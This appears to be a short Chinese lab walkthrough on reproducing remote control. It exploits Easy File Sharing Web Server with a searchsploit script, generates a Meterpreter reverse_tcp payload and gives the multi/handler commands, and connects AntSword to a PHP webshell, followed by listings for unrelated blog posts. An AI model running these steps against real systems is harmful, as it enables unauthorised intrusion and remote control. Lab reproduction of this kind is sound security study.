一、漏洞测试
打开easy file sharing web server
进入后修改端口
点击go可以看到
之后打开kali用searchsploit easy file sharing扫描漏洞
利用对应的Python脚本攻击
攻击完成,说明无法阻挡本身漏洞
二、kali生成被控端和启动主控端
先ifconfig查询kali的ip地址然后生成payload
www.virustotal.com的检测结果
然后启动主控端
然后依次输入1.use exploit/multi/handler
2.set payload windows/meterpreter/reverse_tcp
3.set lhost 目标ip
4.set lport 5000
5.exploit
然后靶机打开payload.exe即可
三、蚁剑控制目标网站
打开phpstudy,启动apache和MySQL
然后生成shell.php
最后打开蚁剑,url地址填http://ip地址(一般为127.0.0.1)/shell.php,连接密码cmd即可
news
2026/5/13 3:07:59
远程控制复现
张小明
前端开发工程师
1.2k
24
版权声明:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设
2026/5/11 0:20:29
贾子智慧商业化——现代创业致胜完整框架 | Kucius Wisdom Commercialization— A Complete Framework for Modern Entrepreneure
贾子智慧商业化——现代创业致胜完整框架 Kucius Wisdom Commercialization — A Complete Framework for Modern Entrepreneurship Success 摘要 Abstract 本文将 Kucius(贾子)144 术变(七十二变 七十二术)改编为现代创业致…
李华
网站建设
2026/4/30 23:19:04
android开发compose系列之Icon
文章目录 前言一、使用二、官方Icon图库的引入 前言 Icon是compose中专门用来展示小图标的组件,传统的View体系中没有对应的控件,该组件支持三种不同类型的图片设置:imageVector矢量图(可显示SVG格式的图标)、ImageBitmap位图(可显示JPG、PN…
李华
网站建设
2026/5/11 18:12:01
重构智慧书-第13条:先知他人别有所图的心思,再伺机行事
一、原文呈现先知他人别有所图的心思,再伺机行事尘世人生本是一场除邪斗恶的战争。狡诈者的武器无非是玩弄种种心计,它常玩的把戏是声东击西。假装瞄准一个目标,煞有介事地佯攻一番,其实心底里却在暗自瞅准别人不留心的靶子,然后伺…
李华
网站建设
2026/5/6 23:48:11
函数介绍及使用
函数 一、为什么需要函数? function,是被设计为执行特定任务的代码块 说明: 函数可以把具有相同或相似逻辑的代码“包裹”起来,通过函数调用执行这些被“包裹”的代码逻辑,这么做的优势是有利于精简代码方便复用。 比如…
李华
网站建设
2026/5/12 17:54:25
Unity ReferenceFinder插件 多选资源查找bug解决
GitHub地址 当选中多个资源 查找引用时,有的资源引用不显示,解决方法: 把ReferenceFinderWindow脚本原来的 while(stack.Count > 0) { … if (!memo.ContainsKey(current[0])) { … } } 替换为下面这段。 // 替换原来的 while(stack.Cou…
李华
网站建设
2026/5/2 7:11:55
AI 工具实战测评:它们到底是“生产力工具”,还是“智商税”?
这两年 AI 工具的数量,已经多到有点离谱了。 从写代码、写文档,到做 PPT、画流程图,几乎每个环节都能塞进一个 AI。问题也随之而来: 这些工具真的能提高效率吗?还是只是“看起来很厉害”?这篇文章不聊概念、…
李华